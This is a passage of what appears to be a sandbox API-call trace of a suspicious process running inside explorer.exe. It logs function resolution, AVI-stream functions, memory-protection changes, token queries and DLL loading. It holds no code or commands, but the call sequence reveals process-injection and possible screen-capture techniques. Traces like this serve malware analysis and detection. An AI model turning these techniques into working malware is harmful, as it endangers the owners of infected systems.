ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0f80) returned 0x0 [0208.744] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad56b0) returned 0x0 [0208.745] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f5d8d0) returned 0x0 [0208.745] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac60a0) returned 0x0 [0208.746] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindNextFileW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5880) returned 0x0 [0208.746] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CopyFileW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5d70) returned 0x0 [0208.746] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetWaitableTimer", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad56c0) returned 0x0 [0208.747] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac9310) returned 0x0 [0208.747] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6470) returned 0x0 [0208.748] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6030) returned 0x0 [0208.748] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrlenW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac64b0) returned 0x0 [0208.748] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac9490) returned 0x0 [0208.749] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateEventA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5560) returned 0x0 [0208.749] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetWindowsDirectoryA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad41b0) returned 0x0 [0208.749] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DeleteFileW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad57a0) returned 0x0 [0208.750] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateDirectoryW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5740) returned 0x0 [0208.750] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateWaitableTimerA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad3870) returned 0x0 [0208.751] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5a00) returned 0x0 [0208.751] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindFirstFileW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5840) returned 0x0 [0208.751] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac9320) returned 0x0 [0208.752] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad2c00) returned 0x0 [0208.752] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SuspendThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0d70) returned 0x0 [0208.753] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitForMultipleObjects", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad56e0) returned 0x0 [0208.753] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ResumeThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acf570) returned 0x0 [0208.754] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpyW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0a80) returned 0x0 [0208.754] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FileTimeToSystemTime", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5bf0) returned 0x0 [0208.754] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbc20) returned 0x0 [0208.755] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateFileW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5770) returned 0x0 [0208.755] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ResetEvent", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad56a0) returned 0x0 [0208.756] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SwitchToThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aca960) returned 0x0 [0208.756] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcatW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad3830) returned 0x0 [0208.757] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateProcessW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acdee0) returned 0x0 [0208.758] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileSize", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5950) returned 0x0 [0208.758] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileAttributesW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5930) returned 0x0 [0208.759] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ExpandEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace420) returned 0x0 [0208.759] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6090) returned 0x0 [0208.760] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LeaveCriticalSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f64420) returned 0x0 [0208.760] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6160) returned 0x0 [0208.760] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="EnterCriticalSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f64ec0) returned 0x0 [0208.761] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetComputerNameA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acc250) returned 0x0 [0208.761] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateMutexA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad55a0) returned 0x0 [0208.762] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenWaitableTimerA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af3a10) returned 0x0 [0208.762] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenMutexA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ab5e30) returned 0x0 [0208.762] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVolumeInformationA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5a20) returned 0x0 [0208.763] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitForSingleObject", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5700) returned 0x0 [0208.763] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ReleaseMutex", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5680) returned 0x0 [0208.764] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetComputerNameW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acc3c0) returned 0x0 [0208.764] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="InitializeCriticalSection", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f938f0) returned 0x0 [0208.764] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acb820) returned 0x0 [0208.765] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acaa40) returned 0x0 [0208.765] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualFree", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbc10) returned 0x0 [0208.766] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetLogicalDriveStringsW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad59d0) returned 0x0 [0208.766] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetFileAttributesA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5900) returned 0x0 [0208.766] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenFileMappingA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad3c10) returned 0x0 [0208.767] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetExitCodeProcess", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ace450) returned 0x0 [0208.767] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateProcessA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acd5b0) returned 0x0 [0208.768] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcpynA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af36c0) returned 0x0 [0208.768] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LocalReAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad2c80) returned 0x0 [0208.769] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acdec0) returned 0x0 [0208.769] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6020) returned 0x0 [0208.770] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac64c0) returned 0x0 [0208.770] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aced90) returned 0x0 [0208.770] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetVersionExW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acaa30) returned 0x0 [0208.771] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aceb90) returned 0x0 [0208.771] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ReadFile", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5a90) returned 0x0 [0208.772] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SetFilePointer", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5b20) returned 0x0 [0208.772] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Thread32First", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad01b0) returned 0x0 [0208.773] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="QueueUserAPC", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acfe40) returned 0x0 [0208.773] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateToolhelp32Snapshot", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad6830) returned 0x0 [0208.774] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenThread", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aca970) returned 0x0 [0208.774] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Thread32Next", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6720) returned 0x0 [0208.774] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindFirstFileA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5800) returned 0x0 [0208.775] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindNextFileA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5860) returned 0x0 [0208.775] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="ConnectNamedPipe", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad30b0) returned 0x0 [0208.776] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetOverlappedResult", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acbb70) returned 0x0 [0208.776] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CancelIo", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad2f50) returned 0x0 [0208.776] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="DisconnectNamedPipe", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad3820) returned 0x0 [0208.777] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FlushFileBuffers", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5890) returned 0x0 [0208.777] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CallNamedPipeA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aefe50) returned 0x0 [0208.778] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="CreateNamedPipeA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af0070) returned 0x0 [0208.778] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aca940) returned 0x0 [0208.779] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="WaitNamedPipeA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af0670) returned 0x0 [0208.779] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac6070) returned 0x0 [0208.780] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="SleepEx", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad56d0) returned 0x0 [0208.780] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977faa5b0) returned 0x0 [0208.781] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977f9a7b0) returned 0x0 [0208.781] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="OpenEventA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad5630) returned 0x0 [0208.782] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="lstrcmpiW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ac65d0) returned 0x0 [0208.783] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="RaiseException", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977aceba0) returned 0x0 [0208.783] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetSystemInfo", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acf580) returned 0x0 [0208.784] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Process32NextW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977acb8f0) returned 0x0 [0208.784] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="Process32FirstW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0020) returned 0x0 [0208.784] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="QueueUserWorkItem", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad0f60) returned 0x0 [0208.785] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FileTimeToLocalFileTime", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad57b0) returned 0x0 [0208.785] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="FindClose", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad57c0) returned 0x0 [0208.786] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="GetDriveTypeW", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977ad58f0) returned 0x0 [0208.786] LdrGetProcedureAddress (in: BaseAddress=0x7ff977ab0000, Name="VirtualProtectEx", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff977af3630) returned 0x0 [0208.786] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="AVIFIL32.dll", BaseAddress=0x235f848 | out: BaseAddress=0x235f848*=0x7ff972350000) returned 0x0 [0208.801] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamRelease", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff9723569a0) returned 0x0 [0208.802] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamWrite", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff972357230) returned 0x0 [0208.802] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileOpenA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff9723568b0) returned 0x0 [0208.803] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileCreateStreamA", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff972356c10) returned 0x0 [0208.803] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIStreamSetFormat", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff972357070) returned 0x0 [0208.804] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileExit", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff972356400) returned 0x0 [0208.805] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileInit", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff9723563d0) returned 0x0 [0208.805] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIMakeCompressedStream", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff972357910) returned 0x0 [0208.806] LdrGetProcedureAddress (in: BaseAddress=0x7ff972350000, Name="AVIFileRelease", Ordinal=0x0, ProcedureAddress=0x235f830 | out: ProcedureAddress=0x235f830*=0x7ff9723569a0) returned 0x0 [0208.817] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f838*=0x7490000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x4, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f838*=0x7490000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.817] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x7491000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x20, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x7491000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.818] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x74c9000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x2, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x74c9000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x74f3000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x4, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x74f3000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x74f8000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x2, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x74f8000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x74fa000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x4, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x74fa000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x235f7d0*=0x74fc000, NumberOfBytesToProtect=0x235f840, NewAccessProtection=0x2, OldAccessProtection=0x235f830 | out: BaseAddress=0x235f7d0*=0x74fc000, NumberOfBytesToProtect=0x235f840, OldAccessProtection=0x235f830*=0x40) returned 0x0 [0208.830] GetTickCount () returned 0x1afb3 [0208.830] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff62aec0000 [0208.830] GetVersion () returned 0x2800000a [0208.830] GetCurrentProcessId () returned 0x834 [0208.830] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x458 [0208.830] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x7aac830, nSize=0x104 | out: lpFilename="C:\\Windows\\Explorer.EXE" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0208.831] lstrcpynA (in: lpString1=0x235f780, lpString2=".bss", iMaxLength=8 | out: lpString1=".bss") returned=".bss" [0208.831] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0208.832] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsWow64Process") returned 0x7ff977ace960 [0208.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0xad8 [0208.832] IsWow64Process (in: hProcess=0xad8, Wow64Process=0x235f720 | out: Wow64Process=0x235f720) returned 1 [0208.832] CloseHandle (hObject=0xad8) returned 1 [0208.832] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7ff976f80000 [0208.833] GetProcAddress (hModule=0x7ff976f80000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x7ff976f9d610 [0208.833] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1 [0208.835] NtOpenProcess (in: ProcessHandle=0x235f6d8, DesiredAccess=0x400, ObjectAttributes=0x235f670*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x235f660*(UniqueProcess=0x834, UniqueThread=0x0) | out: ProcessHandle=0x235f6d8*=0x1328) returned 0x0 [0208.835] NtOpenProcessToken (in: ProcessHandle=0x1328, DesiredAccess=0x8, TokenHandle=0x235f6d0 | out: TokenHandle=0x235f6d0*=0x1324) returned 0x0 [0208.835] NtQueryInformationToken (in: TokenHandle=0x1324, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x235f6c0 | out: TokenInformation=0x0, ReturnLength=0x235f6c0) returned 0xc0000023 [0208.835] NtQueryInformationToken (in: TokenHandle=0x1324, TokenInformationClass=0x1, TokenInformation=0x7aaca40, TokenInformationLength=0x2c, ReturnLength=0x235f6c0 | out: TokenInformation=0x7aaca40, ReturnLength=0x235f6c0) returned 0x0 [0208.835] NtClose (Handle=0x1324) returned 0x0 [0208.835] NtClose (Handle=0x1328) returned 0x0 [0208.835] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ff977360000 [0208.836] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrRChrA") returned 0x7ff977374dd0 [0208.836] StrRChrA (lpStart="C:\\Windows\\Explorer.EXE", lpEnd=0x0, wMatch=0x5c) returned="\\Explorer.EXE" [0208.836] _strupr (in: _String=0x7aac83b | out: _String="EXPLORER.EXE") returned="EXPLORER.EXE" [0208.836] lstrlenA (lpString="EXPLORER.EXE") returned 12 [0208.836] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1328 [0208.836] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ff9757b0000 